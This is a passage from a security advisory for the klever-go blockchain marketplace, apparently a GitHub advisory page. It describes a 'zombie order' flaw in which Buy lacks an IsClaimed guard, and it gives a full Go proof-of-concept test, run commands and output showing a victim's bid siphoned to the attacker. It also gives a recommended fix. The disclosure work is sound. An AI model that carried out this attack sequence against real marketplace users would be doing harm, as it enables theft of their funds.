    marketKappAcc, err := accCacher.LoadKApp(kapps.MarketKAppAddress)
    require.NoError(t, err)

    require.NoError(t, marketKApp.SetMarketplace(marketKappAcc, &kapps.Marketplace{
        ID:                 marketplaceID,
        OwnerAddress:       attacker,
        Name:               []byte("Zombie Market"),
        ReferralAddress:    attacker,
        ReferralPercentage: 0, // keep accounting clean
    }))
    // The NFT is escrowed in the market KApp (as if seller deposited it via Sell).
    require.NoError(t, marketKappAcc.AddInternalKDA(collectionID, assetID, []byte("nft-data")))

    // Auction with Price=0, ReservePrice=R -> bids REST (see Buy L330-337 and
    // Sell L1003-1014: Auction has no Price>0 requirement).
    order := &kapps.MarketOrderData{
        ID:                 orderID,
        MarketplaceID:      marketplaceID,
        MarketType:         kapps.MarketOrderData_Auction,
        OwnerAddress:       attacker,
        CollectionID:       collectionID,
        AssetID:            assetID,
        CurrencyID:         klv,
        Price:              0,       // <-- makes bids rest instead of auto-settle
        ReservePrice:       reserve, // R
        ReferralPercentage: 0,
        StartTime:          blockTime,
        EndTime:            endTime, // future
        IsClaimed:          false,
    }
    require.NoError(t, marketKApp.SetMarketOrder(marketKappAcc, order))
    require.NoError(t, accCacher.UpdateKapp(marketKappAcc))

    // --- Shared KApp context / controller wiring for all handler calls ---
    receiptsStub := mock.NewReceiptsContextStub()
    ctx := &mock.KAppContextStub{
        ContractIDCalled: func() int { return 0 },
        ReceiptsCalled:   func() kapp.ReceiptsContext { return receiptsStub },
        BlockCalled: func() *block.Block {
            return &block.Block{Header: &block.BlockHeader{Timestamp: blockTime}}
        },
        TxNonceCalled: func() uint64 { return 1 },
    }
    // Zero-royalty asset so executeBuyMarket pays only marketOwnerAmount (== bid) to the owner.
    asset := &kapps.KDAData{
        OwnerAddress: attacker,
        Royalties: &kapps.RoyaltiesData{
            Address:          attacker,
            MarketPercentage: 0,
            SplitRoyalties:   make(map[string]*kapps.RoyaltySplitData),
        },
    }
    controllerStub := &stub.KAppControllerStub{
        GetCurrentKAppContextCalled: func() kapp.KappContext { return ctx },
        GetKDAKAppCalled: func() kapp.KDAKapp {
            return &stub.KDAKappStub{
                GetKDACalled: func(_ []byte) (state.KAppAccountHandler, *kapps.KDAData, error) {
                    return nil, asset, nil
                },
            }
        },
    }
    require.NoError(t, marketKApp.SetKAppController(controllerStub))

    balance := func(addr []byte) int64 {
        a, e := accCacher.LoadUser(addr)
        require.NoError(t, e)
        return a.GetBalance(klv, false)
    }

    // ============================================================
    // STEP 1: A places a RESTING bid X via the real Buy handler.
    // ============================================================
    status, err := marketKApp.Buy(attacker, &transaction.BuyContract{
        ID:         orderID,
        CurrencyID: klv,
        Amount:     bidX,
    })
    require.NoError(t, err, "resting bid should succeed")
    require.Equal(t, transaction.Transaction_Ok, status)

    _, restedOrder, err := marketKApp.GetMarketOrder(orderID)
    require.NoError(t, err)
    require.Equal(t, bidX, restedOrder.CurrentBid, "bid must REST (record CurrentBid), not settle")
    require.Equal(t, attacker, restedOrder.CurrentBidder)
    require.False(t, restedOrder.IsClaimed, "resting bid must not settle the order")
    require.Equal(t, fundAttacker-bidX, balance(attacker), "A debited X on the resting bid")

    // ============================================================
    // STEP 2: S(=A) accepts the resting bid EARLY via Claim (seller-accept
    //         branch). This settles the order but leaves EndTime in the future
    //         and does NOT delete the order -> zombie order.
    // ============================================================
    status, err = marketKApp.Claim(attacker, &transaction.ClaimContract{ID: orderID})
    require.NoError(t, err, "early seller-accept claim should succeed")
    require.Equal(t, transaction.Transaction_Ok, status)

    _, settledOrder, err := marketKApp.GetMarketOrder(orderID)
    require.NoError(t, err, "order must remain LOADABLE after early claim (not deleted)")
    require.True(t, settledOrder.IsClaimed, "order is now claimed/settled")
    require.GreaterOrEqual(t, settledOrder.EndTime, blockTime,
        "BUG: early-claim settle path leaves EndTime in the future (order looks live)")
    require.Equal(t, endTime, settledOrder.EndTime, "EndTime was NOT reset by the settle path")

    // A got the NFT proceeds back (owner payout == bid X), so A is whole again post-settle.
    require.Equal(t, fundAttacker, balance(attacker), "A recovered X as owner payout on settle")

    // ============================================================
    // STEP 3: Victim B calls Buy on the ZOMBIE (already-claimed) order with Y>X.
    //         Buy has NO IsClaimed guard -> this SUCCEEDS (the vulnerability).
    // ============================================================
    status, err = marketKApp.Buy(victim, &transaction.BuyContract{
        ID:         orderID,
        CurrencyID: klv,
        Amount:     bidY,
    })
    require.NoError(t, err, "BUG: Buy accepts a bid on an already-claimed (settled) order")
    require.Equal(t, transaction.Transaction_Ok, status,
        "BUG: Buy returns Ok on a claimed order (missing IsClaimed guard)")

    require.Equal(t, fundVictim-bidY, balance(victim), "B debited Y")
    require.Equal(t, fundAttacker+bidX, balance(attacker),
        "A received a PHANTOM refund of X (funded by B) on the zombie order")

    _, zombieOrder, err := marketKApp.GetMarketOrder(orderID)
    require.NoError(t, err)
    require.Equal(t, victim, zombieOrder.CurrentBidder, "B is now CurrentBidder on a claimed order")
    require.Equal(t, bidY, zombieOrder.CurrentBid)
    require.True(t, zombieOrder.IsClaimed, "order is STILL claimed - B is stuck")

    // ============================================================
    // HARM ASSERTION (a): B cannot Claim -> reverts on IsClaimed (market.go L752).
    // ============================================================
    status, err = marketKApp.Claim(victim, &transaction.ClaimContract{ID: orderID})
    require.Error(t, err, "HARM: B's Claim must revert (order already claimed)")
    require.Equal(t, transaction.Transaction_ParameterInvalid, status,
        "HARM: Claim rejected via IsClaimed guard - B cannot retrieve NFT or refund")

    // ============================================================
    // HARM ASSERTION (b): B cannot CancelOrder -> reverts on IsClaimed (market.go L1125).
    // ============================================================
    status, err = marketKApp.CancelOrder(victim, &transaction.CancelMarketOrderContract{OrderID: orderID})
    require.Error(t, err, "HARM: B's CancelOrder must revert (order already claimed)")
    require.Equal(t, transaction.Transaction_ParameterInvalid, status,
        "HARM: CancelOrder rejected via IsClaimed guard - B cannot recover funds")

    // ============================================================
    // HARM ASSERTION (c): Net accounting - B is permanently down Y with no NFT
    //         and no recovery path; A is permanently up X.
    // ============================================================
    require.Equal(t, fundVictim-bidY, balance(victim),
        "HARM: B is down Y (%d) with no NFT and no recoverable path", bidY)
    require.Equal(t, fundAttacker+bidX, balance(attacker),
        "HARM: A is up X (%d), siphoned from B", bidX)

    // Confirm B never received the NFT (it was delivered to A at settle time).
    victimFinal, err := accCacher.LoadUser(victim)
    require.NoError(t, err)
    _, nftErr := victimFinal.SubInternalKDA(collectionID, assetID)
    require.Error(t, nftErr, "HARM: B holds no NFT for the funds it lost")

    t.Logf("PROVEN: B lost %d KLV (balance %d -> %d), unrecoverable. A gained %d KLV (balance %d -> %d). "+
        "Y-X = %d KLV destroyed/stranded.",
        bidY, fundVictim, balance(victim), bidX, fundAttacker, balance(attacker), bidY-bidX)
}

Executable Go test: core/kapp/market/poc_zombie_order_test.go — TestPoC_ZombieOrder_MissingIsClaimedGuardInBuy

Run:

cd klever-go
GOTOOLCHAIN=auto go test ./core/kapp/market/ -run TestPoC_ZombieOrder_MissingIsClaimedGuardInBuy -v

(Local Go 1.23.1 auto-fetches toolchain 1.25.7 per go.mod. Full market package suite passes no regressions.)

Output:

PROVEN: B lost 2000000 KLV (balance 10000000 -> 8000000), unrecoverable.
        A gained 1000000 KLV (balance 10000000 -> 11000000). Y-X = 1000000 KLV destroyed/stranded.
--- PASS: TestPoC_ZombieOrder_MissingIsClaimedGuardInBuy (0.00s)
PASS

Assertions proven (all using real market functions, harm-level not mechanism-level): - Resting bid: Price=0 auction → bid rests (CurrentBid=X, IsClaimed=false), no auto-settle. - Early seller-accept Claim → IsClaimed=true, EndTime still in the future, order still loadable (the zombie). - Victim Buy on the claimed order returns Transaction_Ok (the vulnerability no IsClaimed guard). - Harm (a): victim's Claim reverts Transaction_ParameterInvalid. - Harm (b): victim's CancelOrder reverts Transaction_ParameterInvalid. - Harm (c): victim −Y, attacker +X, victim holds no NFT and has no recovery path.

Impact

  • Direct, permanent fund loss for any bidder who bids on an already-settled order. The victim's entire bid Y is burned with nothing received and no recovery path (Claim and CancelOrder both revert on IsClaimed).
  • Theft: the attacker (seller, also acting as prior bidder A via Sybil) keeps the NFT and harvests ≈X from each subsequent bidder. Repeatable across many bait orders.
  • Value destruction: Y−X per victim is burned (supply strictly decreases this is theft/fund-loss, not net inflation).
  • No privileged role required , anyone can create a marketplace sell order.
  • Real-world likelihood is Medium: the victim must bid on a settled order that, on-chain, still reads EndTime-in-future; exposure depends on whether clients surface claimed orders as biddable (a naive/custom frontend or a sniping bot is trappable).

Impact High × Likelihood Medium -> High.

Recommendation

Add an IsClaimed guard at the top of Buy, mirroring Claim (market.go:752) and CancelOrder (market.go:1125):

if marketOrder.IsClaimed {
    return transaction.Transaction_ParameterInvalid, ErrMarketOrderAlreadyClaimed
}

Defense-in-depth (optional but recommended): in executeBuyMarket, reset EndTime/CurrentBid/CurrentBidder (or delete the order) on early settlement so a settled order is no longer indistinguishable from a live one. Gate any consensus-visible behavior change behind an epoch fork flag so historical blocks reprocess identically.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.7.19"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/klever-io/klever-go"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-82406"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-841"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-09-23T21:24:03Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "**Location:** `core/kapp/market/market.go` \u2014 `Buy()` (approx. L281\u2013436)\\\n**Severity:** High\n\nThe native marketplace enforces an `IsClaimed` guard in `Claim` (`market.go:752`), `CancelOrder` (`market.go:1125`), and `orderEscrowAmount` (`market.go:251`), but **not in `Buy`**.\n\nMarketplace escrow is *virtual*: the market KApp account never custodies currency. A bid burns funds from the bidder (`bidderAcc.SubFromBalance`, ~L378), and refunds/payouts mint to the recipient (`AddToBalance`, e.g. the prior-bidder refund at ~L349). Soundness depends on each order\u0027s `CurrentBid` being paid out exactly once.\n\nA seller can settle a resting-bid auction **early** via the seller-accept branch of `Claim` (~L776) \u2192 `executeBuyMarket` (~L656). That path sets `IsClaimed=true`, delivers the NFT, pays the seller, and re-saves the order (`SetMarketOrder`, ~L726) \u2014 but, unlike every other settle path, it does **not** reset `EndTime` (contrast immediate-buy `Buy` ~L416 and `CancelOrder` ~L1206), and no code path deletes the order. The result is a \"zombie\" order: already settled, yet still loadable with `EndTime` in the future and a stale `CurrentBidder`.\n\nBecause `Buy` has no `IsClaimed` guard, a new bidder can still `Buy` on that settled order (the bid guard at ~L317 only forces the new amount `Y \u003e CurrentBid X`). The new bidder is debited `Y`; the prior bidder is refunded `X` (funded by the new bidder, not minted); the new bidder becomes `CurrentBidder` on an `IsClaimed` order and can then neither `Claim` (reverts on `IsClaimed`) nor `CancelOrder` (reverts on `IsClaimed`). Their funds are lost permanently.\n\n**Attack sequence (permissionless , anyone can create a sell order):**\n1. Attacker (seller `S`) creates a resting-bid auction (`Price=0`, `ReservePrice\u003e0`) for an NFT and self-bids `X` as bidder `A` (Sybil).\n2. `S` accepts `A`\u0027s bid early via `Claim` \u2192 NFT goes to `A` (= attacker, keeps it), `S` (= attacker) collects the owner payout, order marked `IsClaimed=true` but left \"live\".\n3. Victim `B` bids `Y \u003e X` on the still-live-looking auction via `Buy`. `Buy` refunds prior bidder `A` the amount `X` (`AddToBalance`, L349) and burns `Y` from `B` (`SubFromBalance`, L378).\n4. `B` is now `CurrentBidder` on a claimed order and can neither `Claim` nor `CancelOrder` \u2014 both revert on `IsClaimed`. `B`\u0027s `Y` is unrecoverable; `X` of it was siphoned to `A`; `Y\u2212X` is destroyed.\n\n### POC\n```\npackage market\n\nimport (\n\t\"testing\"\n\n\t\"github.com/klever-io/klever-go/common/mock\"\n\t\"github.com/klever-io/klever-go/core/kapp\"\n\t\"github.com/klever-io/klever-go/core/process/kda/kdautils\"\n\t\"github.com/klever-io/klever-go/data/block\"\n\t\"github.com/klever-io/klever-go/data/state\"\n\t\"github.com/klever-io/klever-go/data/transaction\"\n\t\"github.com/klever-io/klever-go/kapps\"\n\t\"github.com/klever-io/klever-go/kvm/mock/stub\"\n\t\"github.com/stretchr/testify/require\"\n)\n\n// TestPoC_ZombieOrder_MissingIsClaimedGuardInBuy proves the fund-loss / theft\n// vulnerability caused by `Buy` lacking the `IsClaimed` guard that `Claim`\n// (market.go L752) and `CancelOrder` (market.go L1125) both enforce.\n//\n// Attack (attacker A == seller S, victim B):\n//  1. S lists an NFT as an Auction with Price=0, ReservePrice=R (bids REST).\n//  2. A places a resting bid X \u003e= R via Buy (records CurrentBid/CurrentBidder,\n//     no settlement because Price==0).\n//  3. S accepts the resting bid early via Claim\u0027s seller-accept branch (L776),\n//     which routes to executeBuyMarket: IsClaimed=true, NFT delivered to A,\n//     proceeds paid to S(=A). This settle path is the ONLY one that does NOT\n//     reset EndTime and does NOT delete the order -\u003e the order becomes a live\n//     \"zombie\" (IsClaimed=true, EndTime in the future, still loadable).\n//  4. Victim B calls Buy on the zombie order with Y \u003e X. Buy has no IsClaimed\n//     guard, so it SUCCEEDS: B is debited Y, prior bidder A is \"refunded\" X\n//     (funded by B), and B becomes CurrentBidder on an already-claimed order.\n//  5. B can NEITHER Claim (reverts on IsClaimed) NOR CancelOrder (reverts on\n//     IsClaimed). B\u0027s Y is unrecoverable; X of it is siphoned to A.\n//\n// HARM proven: B ends down Y with no NFT and no recovery path; A ends up X.\nfunc TestPoC_ZombieOrder_MissingIsClaimedGuardInBuy(t *testing.T) {\n\tconst (\n\t\tblockTime   = int64(1000)\n\t\tendTime     = int64(1_001_000) // future relative to blockTime\n\t\treserve     = int64(1_000_000) // R\n\t\tbidX        = int64(1_000_000) // A\u0027s resting bid (== reserve, \u003e= reserve required)\n\t\tbidY        = int64(2_000_000) // B\u0027s bid on the zombie order (must be \u003e X)\n\t\tfundAttacker = int64(10_000_000)\n\t\tfundVictim   = int64(10_000_000)\n\t)\n\n\tklv := kdautils.KLVIdentifier\n\tcollectionID := []byte(\"ZOMBIE-COLL\")\n\tassetID := []byte(\"1\")\n\tmarketplaceID := []byte(\"mp-zombie\")\n\torderID := []byte(\"order-zombie\")\n\n\tattacker := defaultAddr  // A == S (seller and first bidder)\n\tvictim := defaultOther   // B\n\n\tmarketKApp, accCacher, forkController := createTestMarketKApp(t)\n\t// Post-fork behaviour (guards on royalty overflow enabled); does not touch\n\t// the missing-IsClaimed-guard path being tested.\n\tforkController.FixMarketBuyOverflowValue = true\n\n\t// --- Fund the two user accounts (Buy debits real balances) ---\n\tattackerAcc, err := accCacher.LoadUser(attacker)\n\trequire.NoError(t, err)\n\trequire.NoError(t, attackerAcc.AddToBalance(fundAttacker, klv, false))\n\trequire.NoError(t, accCacher.UpdateUser(attackerAcc))\n\n\tvictimAcc, err := accCacher.LoadUser(victim)\n\trequire.NoError(t, err)\n\trequire.NoError(t, victimAcc.AddToBalance(fundVictim, klv, false))\n\trequire.NoError(t, accCacher.UpdateUser(victimAcc))\n\n\t// --- Set up the market KApp: marketplace + escrowed NFT + resting auction order ---\n\tmarketKappAcc, err := accCacher.LoadKApp(kapps.MarketKAppAddress)\n\trequire.NoError(t, err)\n\n\trequire.NoError(t, marketKApp.SetMarketplace(marketKappAcc, \u0026kapps.Marketplace{\n\t\tID:                 marketplaceID,\n\t\tOwnerAddress:       attacker,\n\t\tName:               []byte(\"Zombie Market\"),\n\t\tReferralAddress:    attacker,\n\t\tReferralPercentage: 0, // keep accounting clean\n\t}))\n\t// The NFT is escrowed in the market KApp (as if seller deposited it via Sell).\n\trequire.NoError(t, marketKappAcc.AddInternalKDA(collectionID, assetID, []byte(\"nft-data\")))\n\n\t// Auction with Price=0, ReservePrice=R -\u003e bids REST (see Buy L330-337 and\n\t// Sell L1003-1014: Auction has no Price\u003e0 requirement).\n\torder := \u0026kapps.MarketOrderData{\n\t\tID:                 orderID,\n\t\tMarketplaceID:      marketplaceID,\n\t\tMarketType:         kapps.MarketOrderData_Auction,\n\t\tOwnerAddress:       attacker,\n\t\tCollectionID:       collectionID,\n\t\tAssetID:            assetID,\n\t\tCurrencyID:         klv,\n\t\tPrice:              0,       // \u003c-- makes bids rest instead of auto-settle\n\t\tReservePrice:       reserve, // R\n\t\tReferralPercentage: 0,\n\t\tStartTime:          blockTime,\n\t\tEndTime:            endTime, // future\n\t\tIsClaimed:          false,\n\t}\n\trequire.NoError(t, marketKApp.SetMarketOrder(marketKappAcc, order))\n\trequire.NoError(t, accCacher.UpdateKapp(marketKappAcc))\n\n\t// --- Shared KApp context / controller wiring for all handler calls ---\n\treceiptsStub := mock.NewReceiptsContextStub()\n\tctx := \u0026mock.KAppContextStub{\n\t\tContractIDCalled: func() int { return 0 },\n\t\tReceiptsCalled:   func() kapp.ReceiptsContext { return receiptsStub },\n\t\tBlockCalled: func() *block.Block {\n\t\t\treturn \u0026block.Block{Header: \u0026block.BlockHeader{Timestamp: blockTime}}\n\t\t},\n\t\tTxNonceCalled: func() uint64 { return 1 },\n\t}\n\t// Zero-royalty asset so executeBuyMarket pays only marketOwnerAmount (== bid) to the owner.\n\tasset := \u0026kapps.KDAData{\n\t\tOwnerAddress: attacker,\n\t\tRoyalties: \u0026kapps.RoyaltiesData{\n\t\t\tAddress:          attacker,\n\t\t\tMarketPercentage: 0,\n\t\t\tSplitRoyalties:   make(map[string]*kapps.RoyaltySplitData),\n\t\t},\n\t}\n\tcontrollerStub := \u0026stub.KAppControllerStub{\n\t\tGetCurrentKAppContextCalled: func() kapp.KappContext { return ctx },\n\t\tGetKDAKAppCalled: func() kapp.KDAKapp {\n\t\t\treturn \u0026stub.KDAKappStub{\n\t\t\t\tGetKDACalled: func(_ []byte) (state.KAppAccountHandler, *kapps.KDAData, error) {\n\t\t\t\t\treturn nil, asset, nil\n\t\t\t\t},\n\t\t\t}\n\t\t},\n\t}\n\trequire.NoError(t, marketKApp.SetKAppController(controllerStub))\n\n\tbalance := func(addr []byte) int64 {\n\t\ta, e := accCacher.LoadUser(addr)\n\t\trequire.NoError(t, e)\n\t\treturn a.GetBalance(klv, false)\n\t}\n\n\t// ============================================================\n\t// STEP 1: A places a RESTING bid X via the real Buy handler.\n\t// ============================================================\n\tstatus, err := marketKApp.Buy(attacker, \u0026transaction.BuyContract{\n\t\tID:         orderID,\n\t\tCurrencyID: klv,\n\t\tAmount:     bidX,\n\t})\n\trequire.NoError(t, err, \"resting bid should succeed\")\n\trequire.Equal(t, transaction.Transaction_Ok, status)\n\n\t_, restedOrder, err := marketKApp.GetMarketOrder(orderID)\n\trequire.NoError(t, err)\n\trequire.Equal(t, bidX, restedOrder.CurrentBid, \"bid must REST (record CurrentBid), not settle\")\n\trequire.Equal(t, attacker, restedOrder.CurrentBidder)\n\trequire.False(t, restedOrder.IsClaimed, \"resting bid must not settle the order\")\n\trequire.Equal(t, fundAttacker-bidX, balance(attacker), \"A debited X on the resting bid\")\n\n\t// ============================================================\n\t// STEP 2: S(=A) accepts the resting bid EARLY via Claim (seller-accept\n\t//         branch). This settles the order but leaves EndTime in the future\n\t//         and does NOT delete the order -\u003e zombie order.\n\t// ============================================================\n\tstatus, err = marketKApp.Claim(attacker, \u0026transaction.ClaimContract{ID: orderID})\n\trequire.NoError(t, err, \"early seller-accept claim should succeed\")\n\trequire.Equal(t, transaction.Transaction_Ok, status)\n\n\t_, settledOrder, err := marketKApp.GetMarketOrder(orderID)\n\trequire.NoError(t, err, \"order must remain LOADABLE after early claim (not deleted)\")\n\trequire.True(t, settledOrder.IsClaimed, \"order is now claimed/settled\")\n\trequire.GreaterOrEqual(t, settledOrder.EndTime, blockTime,\n\t\t\"BUG: early-claim settle path leaves EndTime in the future (order looks live)\")\n\trequire.Equal(t, endTime, settledOrder.EndTime, \"EndTime was NOT reset by the settle path\")\n\n\t// A got the NFT proceeds back (owner payout == bid X), so A is whole again post-settle.\n\trequire.Equal(t, fundAttacker, balance(attacker), \"A recovered X as owner payout on settle\")\n\n\t// ============================================================\n\t// STEP 3: Victim B calls Buy on the ZOMBIE (already-claimed) order with Y\u003eX.\n\t//         Buy has NO IsClaimed guard -\u003e this SUCCEEDS (the vulnerability).\n\t// ============================================================\n\tstatus, err = marketKApp.Buy(victim, \u0026transaction.BuyContract{\n\t\tID:         orderID,\n\t\tCurrencyID: klv,\n\t\tAmount:     bidY,\n\t})\n\trequire.NoError(t, err, \"BUG: Buy accepts a bid on an already-claimed (settled) order\")\n\trequire.Equal(t, transaction.Transaction_Ok, status,\n\t\t\"BUG: Buy returns Ok on a claimed order (missing IsClaimed guard)\")\n\n\trequire.Equal(t, fundVictim-bidY, balance(victim), \"B debited Y\")\n\trequire.Equal(t, fundAttacker+bidX, balance(attacker),\n\t\t\"A received a PHANTOM refund of X (funded by B) on the zombie order\")\n\n\t_, zombieOrder, err := marketKApp.GetMarketOrder(orderID)\n\trequire.NoError(t, err)\n\trequire.Equal(t, victim, zombieOrder.CurrentBidder, \"B is now CurrentBidder on a claimed order\")\n\trequire.Equal(t, bidY, zombieOrder.CurrentBid)\n\trequire.True(t, zombieOrder.IsClaimed, \"order is STILL claimed - B is stuck\")\n\n\t// ============================================================\n\t// HARM ASSERTION (a): B cannot Claim -\u003e reverts on IsClaimed (market.go L752).\n\t// ============================================================\n\tstatus, err = marketKApp.Claim(victim, \u0026transaction.ClaimContract{ID: orderID})\n\trequire.Error(t, err, \"HARM: B\u0027s Claim must revert (order already claimed)\")\n\trequire.Equal(t, transaction.Transaction_ParameterInvalid, status,\n\t\t\"HARM: Claim rejected via IsClaimed guard - B cannot retrieve NFT or refund\")\n\n\t// ============================================================\n\t// HARM ASSERTION (b): B cannot CancelOrder -\u003e reverts on IsClaimed (market.go L1125).\n\t// ============================================================\n\tstatus, err = marketKApp.CancelOrder(victim, \u0026transaction.CancelMarketOrderContract{OrderID: orderID})\n\trequire.Error(t, err, \"HARM: B\u0027s CancelOrder must revert (order already claimed)\")\n\trequire.Equal(t, transaction.Transaction_ParameterInvalid, status,\n\t\t\"HARM: CancelOrder rejected via IsClaimed guard - B cannot recover funds\")\n\n\t// ============================================================\n\t// HARM ASSERTION (c): Net accounting - B is permanently down Y with no NFT\n\t//         and no recovery path; A is permanently up X.\n\t// ============================================================\n\trequire.Equal(t, fundVictim-bidY, balance(victim),\n\t\t\"HARM: B is down Y (%d) with no NFT and no recoverable path\", bidY)\n\trequire.Equal(t, fundAttacker+bidX, balance(attacker),\n\t\t\"HARM: A is up X (%d), siphoned from B\", bidX)\n\n\t// Confirm B never received the NFT (it was delivered to A at settle time).\n\tvictimFinal, err := accCacher.LoadUser(victim)\n\trequire.NoError(t, err)\n\t_, nftErr := victimFinal.SubInternalKDA(collectionID, assetID)\n\trequire.Error(t, nftErr, \"HARM: B holds no NFT for the funds it lost\")\n\n\tt.Logf(\"PROVEN: B lost %d KLV (balance %d -\u003e %d), unrecoverable. A gained %d KLV (balance %d -\u003e %d). \"+\n\t\t\"Y-X = %d KLV destroyed/stranded.\",\n\t\tbidY, fundVictim, balance(victim), bidX, fundAttacker, balance(attacker), bidY-bidX)\n}\n```\nExecutable Go test: `core/kapp/market/poc_zombie_order_test.go` \u2014 `TestPoC_ZombieOrder_MissingIsClaimedGuardInBuy`\n\nRun:\n```\ncd klever-go\nGOTOOLCHAIN=auto go test ./core/kapp/market/ -run TestPoC_ZombieOrder_MissingIsClaimedGuardInBuy -v\n```\n(Local Go 1.23.1 auto-fetches toolchain 1.25.7 per `go.mod`. Full market package suite passes no regressions.)\n\nOutput:\n```\nPROVEN: B lost 2000000 KLV (balance 10000000 -\u003e 8000000), unrecoverable.\n        A gained 1000000 KLV (balance 10000000 -\u003e 11000000). Y-X = 1000000 KLV destroyed/stranded.\n--- PASS: TestPoC_ZombieOrder_MissingIsClaimedGuardInBuy (0.00s)\nPASS\n```\n\nAssertions proven (all using real market functions, harm-level not mechanism-level):\n- Resting bid: `Price=0` auction \u2192 bid rests (`CurrentBid=X`, `IsClaimed=false`), no auto-settle.\n- Early seller-accept `Claim` \u2192 `IsClaimed=true`, `EndTime` still in the future, order still loadable (the zombie).\n- Victim `Buy` on the claimed order returns `Transaction_Ok` (the vulnerability no `IsClaimed` guard).\n- Harm (a): victim\u0027s `Claim` reverts `Transaction_ParameterInvalid`.\n- Harm (b): victim\u0027s `CancelOrder` reverts `Transaction_ParameterInvalid`.\n- Harm (c): victim `\u2212Y`, attacker `+X`, victim holds no NFT and has no recovery path.\n\n### Impact\n\n- **Direct, permanent fund loss** for any bidder who bids on an already-settled order. The victim\u0027s entire bid `Y` is burned with nothing received and no recovery path (`Claim` and `CancelOrder` both revert on `IsClaimed`).\n- **Theft**: the attacker (seller, also acting as prior bidder `A` via Sybil) keeps the NFT *and* harvests `\u2248X` from each subsequent bidder. Repeatable across many bait orders.\n- **Value destruction**: `Y\u2212X` per victim is burned (supply strictly decreases  this is theft/fund-loss, not net inflation).\n- No privileged role required , anyone can create a marketplace sell order.\n- Real-world likelihood is Medium: the victim must bid on a settled order that, on-chain, still reads `EndTime`-in-future; exposure depends on whether clients surface claimed orders as biddable (a naive/custom frontend or a sniping bot is trappable). \n\nImpact High \u00d7 Likelihood Medium -\u003e **High**.\n\n### Recommendation\n\nAdd an `IsClaimed` guard at the top of `Buy`, mirroring `Claim` (`market.go:752`) and `CancelOrder` (`market.go:1125`):\n\n```go\nif marketOrder.IsClaimed {\n    return transaction.Transaction_ParameterInvalid, ErrMarketOrderAlreadyClaimed\n}\n```\n\nDefense-in-depth (optional but recommended): in `executeBuyMarket`, reset `EndTime`/`CurrentBid`/`CurrentBidder` (or delete the order) on early settlement so a settled order is no longer indistinguishable from a live one. Gate any consensus-visible behavior change behind an epoch fork flag so historical blocks reprocess identically.",
  "id": "GHSA-26r5-4mm2-px5c",
  "modified": "2026-09-23T21:24:03Z",
  "published": "2026-09-23T21:24:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/klever-io/klever-go/security/advisories/GHSA-26r5-4mm2-px5c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/klever-io/klever-go/pull/16"
    },
    {
      "type": "WEB",
      "url": "https://github.com/klever-io/klever-go/commit/063bb3ed98f9a84a4b1f7286680613a5fc3c91b2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/klever-io/klever-go"
    },
    {
      "type": "WEB",
      "url": "https://github.com/klever-io/klever-go/releases/tag/v1.7.20"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Klever-Go: Zombie-order theft: `Buy` missing `IsClaimed` guard in native marketplace"
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.